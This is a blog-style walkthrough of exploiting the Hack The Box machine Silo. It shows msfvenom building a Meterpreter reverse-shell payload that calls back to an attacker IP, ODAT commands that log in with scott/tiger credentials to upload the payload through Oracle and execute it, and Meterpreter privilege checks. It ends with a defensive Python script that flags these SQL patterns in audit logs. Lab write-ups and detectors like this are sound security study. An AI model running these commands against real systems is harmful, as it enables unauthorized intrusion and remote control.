This post continues the previous article about hacking Silo, a penetration-testing box from Hack The Box.
The last steps we completed were the recon and enumeration phases of the penetration test, so we can now continue with exploitation to gain access to the server.
We have the user name and password from the earlier enumeration, so we can use them to exploit the server and gain access.
ODAT can deliver malware to the system by using Oracle's ability to write a file to the server. Let's first build the payload with msfvenom using the command below:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.73 lport=4545 -f exe > rio.exe
Let's deliver the malware to the server with ODAT's utlfile functionality. The command looks like this:
./odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ rio.exe rio.exe
We have successfully delivered our payload to the server using Oracle's file-write function. The malware is now at C:/rio.exe.
Now we can invoke the malware using Oracle's ability to run an executable through an external table. Before we execute it, though, let's set up the reverse handler with the Metasploit multi handler.
Once the reverse handler is running, we can invoke the payload on the remote server with the ODAT command below:
./odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ rio.exe
After ODAT has successfully executed the payload on the remote server, check the reverse handler in Metasploit; there should be one session created.
We can now start interacting with the established session using the command:
sessions -i 1 (1 is the session ID)
Meterpreter provides a lot of functionality that you can use for post-exploitation; just type help in the Meterpreter session to list it.
For example, we can check who we are on the target system with the command below:
meterpreter > getuid
The output shows that we are running as the highest-privilege account on the server. You can also list the privileges you hold with this command:
meterpreter > getprivs
OK, that is all for this lab. We were finally able to hack the server and get the highest privilege. In the next post I will show you another technique that involves a bit more manual work but is also effective for some kinds of exploitation.
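Seen from the database side, the file write and the external-table execution used above both leave SQL that an audit trail can be searched for. The following is an added example, not code from this walkthrough or from ODAT: it triages statement records per session. The record format, the rule names and the sample statements are assumptions, constructed to resemble a UTL_FILE write and an ORACLE_LOADER PREPROCESSOR clause rather than captured from the tool.

```python
import re
from collections import defaultdict

# Constructed (session id, user, SQL text) records standing in for an Oracle
# statement audit trail; the format and the statements are assumptions.
SAMPLE_AUDIT = [
    (101, "SCOTT", "SELECT ename FROM emp"),
    (102, "SCOTT", "CREATE OR REPLACE DIRECTORY TMPDIR1 AS 'c:/'"),
    (102, "SCOTT", "DECLARE f UTL_FILE.FILE_TYPE; BEGIN f := UTL_FILE.FOPEN("
                   "'TMPDIR1','rio.exe','wb'); UTL_FILE.PUT_RAW(f, :data); END;"),
    (103, "SCOTT", "CREATE OR REPLACE DIRECTORY TMPDIR2 AS 'c:/'"),
    (103, "SCOTT", "CREATE TABLE t1 (line VARCHAR2(256)) ORGANIZATION EXTERNAL "
                   "(TYPE ORACLE_LOADER DEFAULT DIRECTORY TMPDIR2 ACCESS PARAMETERS "
                   "(RECORDS DELIMITED BY NEWLINE PREPROCESSOR TMPDIR2:'rio.exe') "
                   "LOCATION ('rio.exe'))"),
    (104, "HR", "CREATE TABLE ext_sales (id NUMBER) ORGANIZATION EXTERNAL "
                "(TYPE ORACLE_LOADER DEFAULT DIRECTORY DATA_DIR LOCATION ('sales.csv'))"),
]

RULES = {
    "directory_created": re.compile(r"\bCREATE\s+(OR\s+REPLACE\s+)?DIRECTORY\b", re.I),
    # UTL_FILE.FOPEN(location, filename, open_mode): modes w/a/wb/ab write to disk.
    "utl_file_write": re.compile(r"\bUTL_FILE\.FOPEN\s*\([^)]*,\s*'[wa]b?'", re.I),
    # An ORACLE_LOADER PREPROCESSOR clause makes the database run a program on SELECT.
    "exttable_preprocessor": re.compile(r"\bORGANIZATION\s+EXTERNAL\b.*\bPREPROCESSOR\b", re.I | re.S),
}
EXECUTABLE = re.compile(r"'[^']*\.(exe|dll|bat|cmd|ps1)'", re.I)

def triage(records):
    """Group rule hits by session and return {session: (user, severity, hits)}."""
    hits, users = defaultdict(set), {}
    for sid, user, sql in records:
        matched = {name for name, rx in RULES.items() if rx.search(sql)}
        if matched and EXECUTABLE.search(sql):
            matched.add("executable_name")
        if matched:
            hits[sid] |= matched
            users[sid] = user
    findings = {}
    for sid, names in hits.items():
        # A directory object alone is routine; a preprocessor clause, or a file
        # write that names an executable, is the pattern worth an analyst's time.
        risky = "exttable_preprocessor" in names or {"utl_file_write", "executable_name"} <= names
        findings[sid] = (users[sid], "high" if risky else "low", sorted(names))
    return findings

if __name__ == "__main__":
    for sid, finding in sorted(triage(SAMPLE_AUDIT).items()):
        print(sid, *finding)
```

The ordinary external table in session 104 is not flagged, because it has no PREPROCESSOR clause.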